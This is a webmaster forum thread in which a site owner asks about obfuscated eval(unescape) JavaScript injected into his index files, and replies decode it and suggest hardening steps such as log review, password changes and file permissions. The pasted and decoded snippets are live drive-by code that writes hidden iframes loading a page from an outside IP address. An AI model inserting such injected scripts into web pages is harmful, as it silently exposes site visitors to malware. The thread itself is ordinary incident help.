I mean some motherfucker psoted this script all over my sites index files <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%66%31%63%34%30%62%31%32%38%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%31%2e%32%39%2e%32%34%31%2e%37%30%2f%6e%65%77%2f%63%6f%75%6e%74%65%72%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%33%38%36%38%29%2b%27%66%62%39%36%64%5c%27%20%77%69%64%74%68%3d%35%37%37%20%68%65%69%67%68%74%3d%32%38%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%31%35%33%61%64%36%33%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%31%2e%32%39%2e%32%34%31%2e%37%30%2f%6e%65%77%2f%63%6f%75%6e%74%65%72%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%36%35%30%30%29%2b%27%35%34%36%38%39%33%37%66%30%5c%27%20%77%69%64%74%68%3d%33%38%36%20%68%65%69%67%68%74%3d%32%35%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script> How can I translate them. And is that a host fault? I mean how he gaied access to index files? How to protect myself in the future?
Check when you webfiles were modified, then look in your access_logs for anything odd during that timeframe, maybe backtrack a little. You should be able to see the request they made that made this possible, with that knowledge you can patch the exploit, or write a mod_security rule to prevent it in the future. Cheers.
Decoded the code, and this is how it looks like: <script>eval(unescape("window.status='Done';document.write('<iframe name=f1c40b128 src=\'http://81.29.241.70/new/counter.php?'+Math.round(Math.random()*163868)+'fb96d\' width=577 height=284 style=\'display: none\'></iframe>')")); </script> <script>eval(unescape("window.status='Done';document.write('<iframe name=9153ad63b src=\'http://81.29.241.70/new/counter.php?'+Math.round(Math.random()*96500)+'5468937f0\' width=386 height=250 style=\'display: none\'></iframe>')")); </script> Code (markup): You'll better change your ftp password, make sure that no php/html file is chmoded to 777, and you'll better contact your server administrator about that.
Check your file permissions, a common mistake, that you have to pay for if someone that wants to ruin your site detects it. I would strongly advise you to check all files and edit the permissions to more appropiate ones. Meti
The bastard hacke all my index files for al lmy websites If i set the permissio of those to 777 the site will not work? What do you mean to check the permissions?
The permissions, like the attributes/CHMOD, make sure there not 777, if not change all your passwords.
755 is the default folder setting. If you need to do some stuff such as uploading, enabling audio streaming from other website, then you will need 775. Never ever use jackpot (777). Programmers with advance knowledge could easily break in using remote access. 777 means that you allow everyone to upload files and execute it. Even if it is a dangerous one.
It uses javascript to redirect everysingle user who load that page to a webpage that contains viruses. Use the link below to see. http://www.google.com/search?hl=en&...US:official&hs=A5P&q=81.29.241.70&btnG=Search